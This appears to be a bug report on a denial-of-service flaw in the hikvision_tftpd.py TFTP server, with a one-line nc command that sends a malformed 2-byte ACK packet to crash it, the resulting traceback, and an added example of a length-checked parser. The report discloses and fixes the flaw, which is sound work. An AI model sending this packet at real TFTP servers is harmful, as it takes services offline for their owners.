There is a Denial-of-Service bug in the `_tftp_read` function in the `Server` class on the parse of a packet with content `0x0004`.
Download the firmware `digicap.dav` to the root directory of the project from hikvisioneurope.
```
python hikvision_tftpd.py --server-ip 127.0.0.1
```
Send a UDP packet with the following payload:
```
echo -n "0004" | xxd -r -p | nc -u 127.0.0.1 69
```
Then, the server will crash and the logs are as follows:
```
Setting block size to 512
Serving 22651096-byte digicap.dav (block size 512, 44241 blocks)
Traceback (most recent call last):
  File "hikvision_tftpd.py", line 193, in <module>
    server.run_forever()
  File "hikvision_tftpd.py", line 102, in run_forever
    self._iterate()
  File "hikvision_tftpd.py", line 110, in _iterate
    self._tftp_read()
  File "hikvision_tftpd.py", line 139, in _tftp_read
    '>H', pkt[len(self._TFTP_ACK_PREFIX):])
struct.error: unpack requires a string argument of length 2
```
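Added example, not part of the original issue or the project's code: the unchecked unpack pattern visible in the traceback next to a length-validated ACK parser that drops malformed datagrams instead of raising. It assumes the ACK prefix is the 2-byte TFTP opcode 4 from RFC 1350; `parse_ack`, `parse_ack_unchecked` and `handle_datagrams` are hypothetical names, and the sample packets are constructed.

```python
import struct

# Assumption: the ACK prefix is the 2-byte TFTP opcode 4 (RFC 1350),
# matching the 0x0004 payload in the report.
TFTP_ACK_PREFIX = b"\x00\x04"
ACK_LEN = len(TFTP_ACK_PREFIX) + 2  # opcode + 16-bit block number


def parse_ack_unchecked(pkt):
    """Pattern from the traceback: unpack with no length check (raises on short input)."""
    return struct.unpack(">H", pkt[len(TFTP_ACK_PREFIX):])[0]


def parse_ack(pkt):
    """Return the acknowledged block number, or None if pkt is not a well-formed ACK."""
    if len(pkt) != ACK_LEN or not pkt.startswith(TFTP_ACK_PREFIX):
        return None
    (block,) = struct.unpack(">H", pkt[len(TFTP_ACK_PREFIX):])
    return block


def handle_datagrams(datagrams, expected_block):
    """Hypothetical receive loop: skip anything that is not a valid ACK and keep serving."""
    dropped = 0
    for pkt in datagrams:
        block = parse_ack(pkt)
        if block is None:
            dropped += 1         # malformed or non-ACK: count it, do not crash
            continue
        if block == expected_block:
            expected_block += 1  # peer acknowledged the block, move on
    return expected_block, dropped


# Constructed sample input: the reported 2-byte packet, an oversized ACK,
# a packet with a different opcode, then two valid ACKs.
SAMPLES = [
    b"\x00\x04",
    b"\x00\x04\x00\x01\xff",
    b"\x00\x05\x00\x01",
    b"\x00\x04\x00\x01",
    b"\x00\x04\x00\x02",
]

if __name__ == "__main__":
    print(handle_datagrams(SAMPLES, expected_block=1))
```

Because TFTP runs over UDP, any host that can reach the port can send the short packet, so the check belongs before every `struct.unpack` on received data.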